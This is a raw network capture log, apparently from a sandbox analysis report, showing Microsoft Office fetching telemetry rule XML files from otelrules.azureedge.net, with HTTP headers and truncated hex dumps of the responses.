                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    129192.168.2.56049813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:40 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1399
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                                                    x-ms-request-id: c3d8694b-101e-0046-45a3-2691b0000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120840Z-16849878b78q9m8bqvwuva4svc00000004yg00000000e5df
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    130192.168.2.56050113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:41 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1403
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                                    x-ms-request-id: 80bd6f28-d01e-002b-3d65-2725fb000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120841Z-r197bdfb6b4grkz4xgvkar0zcs0000000650000000003ba1
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    131192.168.2.56050013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:41 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1362
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                                    x-ms-request-id: 5739e3c9-901e-0016-14e5-28efe9000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120841Z-r197bdfb6b42rt68rzg9338g1g00000007r00000000061a4
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    132192.168.2.56050213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:41 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1366
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                                                    x-ms-request-id: 68df6217-401e-0029-6d9c-279b43000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120841Z-16849878b78p49s6zkwt11bbkn000000062000000000f84h
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    133192.168.2.56050313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:41 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1399
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                                                    x-ms-request-id: 54290c1c-d01e-008e-01bf-27387a000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120841Z-15b8d89586fhl2qtatrz3vfkf00000000ckg000000008a29
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    134192.168.2.56050413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:41 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1362
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                                                    x-ms-request-id: 6c5e14af-601e-0002-6c01-27a786000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120841Z-17c5cb586f6w4mfs5xcmnrny6n000000086000000000643z
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:41 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    135192.168.2.56050613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:42 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1366
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                                                    x-ms-request-id: cf3e7330-401e-0078-5ca6-264d34000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120842Z-16849878b786lft2mu9uftf3y400000007tg000000005wc7
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    136192.168.2.56050513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:42 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1403
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                                                    x-ms-request-id: 60449bdf-301e-005d-500b-26e448000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120842Z-16849878b78g2m84h2v9sta29000000005dg0000000093wz
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    137192.168.2.56050813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:42 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
